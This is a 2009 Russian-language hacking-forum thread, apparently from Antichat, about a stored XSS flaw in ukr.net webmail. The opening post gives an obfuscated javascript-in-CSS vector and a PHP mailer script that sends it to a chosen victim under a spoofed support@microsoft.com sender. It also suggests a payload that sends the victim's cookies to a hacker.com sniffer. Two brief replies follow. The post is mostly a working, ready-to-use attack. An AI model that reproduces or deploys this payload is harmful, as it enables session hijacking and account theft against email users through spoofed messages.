HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Active XSS [ukr.net]
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Active XSS [ukr.net]
  #1  
Старый 14.05.2009, 23:55
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию Active XSS [ukr.net]
Всем привет) На днях исследовал почту ukr.net'a Хотя нет, начну с того что мне жаль было постить это в паблике, так как проверено, быстро пофиксят.

Вообщем смотря сорцы одного из писем, я заметил что контент весь в :

Код:
<script>
	messageBody = '\nPew pew!';
	readmsgSetMessageBody();	
	</script>
Это уже выдвигало на некии мысли. Покопавшись еще чуть я остановился на таком вот векторе:

Код:
<font style="background:url\(javas/**/cript:eval(String.fromCharCode([evil encoded code])))">
Opera: [-]
IE: [+]
FF: [-]
Небольшой скриптик для отправки:
PHP код:
<?php
/**
 * (c) Dimi4, 2009
 * 
*/   
$target "petya@ukr.net";
$subj "Pew pew!";
$payload ="";
$evilcode="alert(1);"//img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;
$strlenstrlen($evilcode);
        for($i=0$i !== $strlen$i++)
        {
            if($i+== $strlen$payload .= ord($evilcode[$i]);
            else $payload .= ord($evilcode[$i]).',';
        }
$header  "From: support@microsoft.com\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/html\r\n";
$msg ='<font style="background:url\(javas/**/cript:eval(String.fromCharCode('.$payload.')))">';
mail($target,$subj,$msg,$header);
?>
Собстна меняем $target на нужное мыло, и $evilcode на ченить хекерское, например имедж со снифером:
Код:
img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 04.06.2009, 00:29
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию
from roa
__________________
..
 
Ответить с цитированием

  #3  
Старый 04.06.2009, 00:53
Exlibris
Постоянный
Регистрация: 26.02.2007
Сообщений: 495
С нами: 10107340

Репутация: 1386
По умолчанию
good блин хакер =(
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS Corwin Веб-уязвимости 1 19.09.2009 14:01
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.